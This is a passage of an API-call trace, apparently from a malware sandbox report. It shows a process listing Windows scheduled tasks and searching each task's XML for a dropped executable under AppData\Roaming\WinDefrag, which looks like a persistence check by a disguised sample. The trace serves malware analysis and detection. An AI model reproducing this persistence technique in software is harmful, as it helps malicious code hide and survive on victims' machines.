PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.458] IUnknown:Release (This=0x458120) returned 0x0 [0258.458] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458120) returned 0x0 [0258.458] IRegisteredTask:get_Name (in: This=0x458120, pName=0x1edb10 | out: pName=0x1edb10*="UserTask") returned 0x0 [0258.458] IRegisteredTask:get_Xml (in: This=0x458120, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n") returned 0x0 [0258.461] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1503]]</Select></Query></QueryList>\r\n \r\n \r\n true\r\n \r\n \r\n \r\n PT8H\r\n \r\n true\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n false\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n true\r\n PT0S\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.507] IUnknown:Release (This=0x458120) returned 0x0 [0258.507] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458120) returned 0x0 [0258.507] IRegisteredTask:get_Name (in: This=0x458120, pName=0x1edb10 | out: pName=0x1edb10*="UserTask-Roam") returned 0x0 [0258.507] IRegisteredTask:get_Xml (in: This=0x458120, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n") returned 0x0 [0258.510] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\CertificateServicesClient\\UserTask-Roam\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFW;;;IU)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-100)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-101)\r\n $(@%SystemRoot%\\system32\\dimsjob.dll,-102)\r\n \r\n \r\n \r\n SessionLock\r\n \r\n \r\n SessionUnlock\r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n \r\n {58fb76b9-ac85-4e55-ac04-427593b1d060}\r\n \r\n \r\n \r\n \r\n Parallel\r\n true\r\n \r\n PT1M\r\n 5\r\n \r\n PT0S\r\n true\r\n false\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.545] IUnknown:Release (This=0x458120) returned 0x0 [0258.545] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.545] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0258.547] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.547] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.547] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.547] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.547] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x457fd0) returned 0x0 [0258.551] IRegisteredTaskCollection:get_Count (in: This=0x457fd0, pCount=0x1edc70 | out: pCount=0x1edc70*=3) returned 0x0 [0258.551] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458140) returned 0x0 [0258.551] IRegisteredTask:get_Name (in: This=0x458140, pName=0x1edb10 | out: pName=0x1edb10*="Consolidator") returned 0x0 [0258.551] IRegisteredTask:get_Xml (in: This=0x458140, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n") returned 0x0 [0258.554] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-106)\r\n Microsoft Corporation\r\n $(@%systemRoot%\\system32\\wsqmcons.exe,-107)\r\n 1.0\r\n \r\n \r\n \r\n 2004-01-02T00:00:00\r\n \r\n PT19H\r\n \r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n false\r\n true\r\n false\r\n false\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\wsqmcons.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.589] IUnknown:Release (This=0x458140) returned 0x0 [0258.589] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458140) returned 0x0 [0258.589] IRegisteredTask:get_Name (in: This=0x458140, pName=0x1edb10 | out: pName=0x1edb10*="KernelCeipTask") returned 0x0 [0258.589] IRegisteredTask:get_Xml (in: This=0x458140, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n") returned 0x0 [0258.593] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-601)\r\n \\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask\r\n $(@%SystemRoot%\\system32\\kernelceip.dll,-602)\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)\r\n \r\n \r\n \r\n 2008-09-01T03:30:00\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n PT3M\r\n PT17H\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n SeChangeNotifyPrivilege\r\n \r\n \r\n \r\n \r\n \r\n {e7ed314f-2816-4c26-aeb5-54a34d02404c}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.639] IUnknown:Release (This=0x458140) returned 0x0 [0258.639] IRegisteredTaskCollection:get_Item (in: This=0x457fd0, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458140) returned 0x0 [0258.639] IRegisteredTask:get_Name (in: This=0x458140, pName=0x1edb10 | out: pName=0x1edb10*="UsbCeip") returned 0x0 [0258.639] IRegisteredTask:get_Xml (in: This=0x458140, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n") returned 0x0 [0258.642] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\system32\\usbceip.dll,-601)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-600)\r\n $(@%SystemRoot%\\system32\\usbceip.dll,-602)\r\n Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)\r\n 1.0\r\n \r\n \r\n \r\n 2008-04-25T01:30:00\r\n true\r\n \r\n 3\r\n \r\n \r\n \r\n \r\n true\r\n \r\n PT45M\r\n 1\r\n \r\n IgnoreNew\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n {c27f6b1d-fe0b-45e4-9257-38799fa69bc8}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.685] IUnknown:Release (This=0x458140) returned 0x0 [0258.685] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.685] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0258.686] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.686] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.686] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.687] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x8, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.687] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b80) returned 0x0 [0258.688] IRegisteredTaskCollection:get_Count (in: This=0x456b80, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0258.688] IRegisteredTaskCollection:get_Item (in: This=0x456b80, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458070) returned 0x0 [0258.689] IRegisteredTask:get_Name (in: This=0x458070, pName=0x1edb10 | out: pName=0x1edb10*="ScheduledDefrag") returned 0x0 [0258.689] IRegisteredTask:get_Xml (in: This=0x458070, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n") returned 0x0 [0258.692] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\defragsvc.dll,-800)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-801)\r\n $(@%systemroot%\\system32\\defragsvc.dll,-802)\r\n Microsoft\\Windows\\Defrag\\ScheduledDefrag\r\n \r\n \r\n \r\n 2017-09-27T01:00:00\r\n false\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n true\r\n true\r\n true\r\n false\r\n \r\n PT3M\r\n P7D\r\n true\r\n true\r\n \r\n true\r\n false\r\n false\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\defrag.exe\r\n -c\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.741] IUnknown:Release (This=0x458070) returned 0x0 [0258.741] IUnknown:Release (This=0x456b80) returned 0x0 [0258.741] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x457fd0) returned 0x0 [0258.742] ITaskFolderCollection:get_Count (in: This=0x457fd0, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.742] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.742] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.742] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x9, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.742] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0258.745] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0258.745] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0258.745] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="Scheduled") returned 0x0 [0258.745] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n") returned 0x0 [0258.748] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\sdiagschd.dll,-101)\r\n 1.0\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-102)\r\n $(@%systemroot%\\system32\\sdiagschd.dll,-103)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n \\Microsoft\\Windows\\Diagnosis\\Scheduled\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT8H\r\n false\r\n false\r\n \r\n StopExisting\r\n true\r\n true\r\n false\r\n true\r\n false\r\n true\r\n true\r\n true\r\n true\r\n false\r\n 7\r\n true\r\n \r\n \r\n \r\n {c1f85ef8-bcc2-4606-bb39-70c523715eb3}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.795] IUnknown:Release (This=0x457fd0) returned 0x0 [0258.795] IUnknown:Release (This=0x456b40) returned 0x0 [0258.795] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0258.797] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.797] IUnknown:Release (This=0x456b40) returned 0x0 [0258.797] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.797] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.797] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0258.800] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=2) returned 0x0 [0258.800] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0258.800] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="Microsoft-Windows-DiskDiagnosticDataCollector") returned 0x0 [0258.801] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n") returned 0x0 [0258.803] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticDataCollector\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-119)\r\n \r\n \r\n true\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n false\r\n true\r\n false\r\n \r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2004-01-01T01:00:00\r\n \r\n \r\n \r\n \r\n 2\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n InteractiveToken\r\n LeastPrivilege\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n dfdts.dll,DfdGetDefaultPolicyAndSMART\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.840] IUnknown:Release (This=0x458030) returned 0x0 [0258.840] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x458030) returned 0x0 [0258.840] IRegisteredTask:get_Name (in: This=0x458030, pName=0x1edb10 | out: pName=0x1edb10*="Microsoft-Windows-DiskDiagnosticResolver") returned 0x0 [0258.840] IRegisteredTask:get_Xml (in: This=0x458030, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n") returned 0x0 [0258.842] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-101)\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-100)\r\n Microsoft\\Windows\\DiskDiagnostic\\Microsoft-Windows-DiskDiagnosticResolver\r\n D:(A;;GA;;;BA)(A;;GA;;;SY)(A;;FR;;;BU)\r\n 1.0\r\n $(@%SystemRoot%\\System32\\DFDTS.dll,-118)\r\n \r\n \r\n true\r\n false\r\n Parallel\r\n false\r\n false\r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\DFDWiz.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0258.868] IUnknown:Release (This=0x458030) returned 0x0 [0258.868] IUnknown:Release (This=0x456b40) returned 0x0 [0258.868] ITaskFolder:GetFolders (in: This=0x45a670, flags=0, ppFolders=0x1edb08 | out: ppFolders=0x1edb08*=0x456b40) returned 0x0 [0258.869] ITaskFolderCollection:get_Count (in: This=0x456b40, pCount=0x1edc88 | out: pCount=0x1edc88*=0) returned 0x0 [0258.869] IUnknown:Release (This=0x456b40) returned 0x0 [0258.869] TaskScheduler:IUnknown:Release (This=0x45a670) returned 0x0 [0258.869] ITaskFolderCollection:get_Item (in: This=0x4569f0, index=0x1edce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xb, varVal2=0x0), ppFolder=0x1edc90 | out: ppFolder=0x1edc90*=0x45a670) returned 0x0 [0258.869] ITaskFolder:GetTasks (in: This=0x45a670, flags=1, ppTasks=0x1edb20 | out: ppTasks=0x1edb20*=0x456b40) returned 0x0 [0258.871] IRegisteredTaskCollection:get_Count (in: This=0x456b40, pCount=0x1edc70 | out: pCount=0x1edc70*=1) returned 0x0 [0258.871] IRegisteredTaskCollection:get_Item (in: This=0x456b40, index=0x1edb50*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x1edb18 | out: ppRegisteredTask=0x1edb18*=0x457fd0) returned 0x0 [0258.871] IRegisteredTask:get_Name (in: This=0x457fd0, pName=0x1edb10 | out: pName=0x1edb10*="Notifications") returned 0x0 [0258.871] IRegisteredTask:get_Xml (in: This=0x457fd0, pXml=0x1edb00 | out: pXml=0x1edb00*="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select Path=\"Application\">*[System[Provider[@Name='LocationNotifications'] and EventID=1]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n \r\n \r\n %windir%\\System32\\LocationNotifications.exe\r\n \r\n \r\n") returned 0x0 [0258.873] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemRoot%\\system32\\LocationNotifications.exe,-102)\r\n Microsoft\\Windows\\Location\\Notifications\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n 1.3\r\n \r\n \r\n \r\n true\r\n <QueryList><Query Id=\"0\" Path=\"Application\"><Select 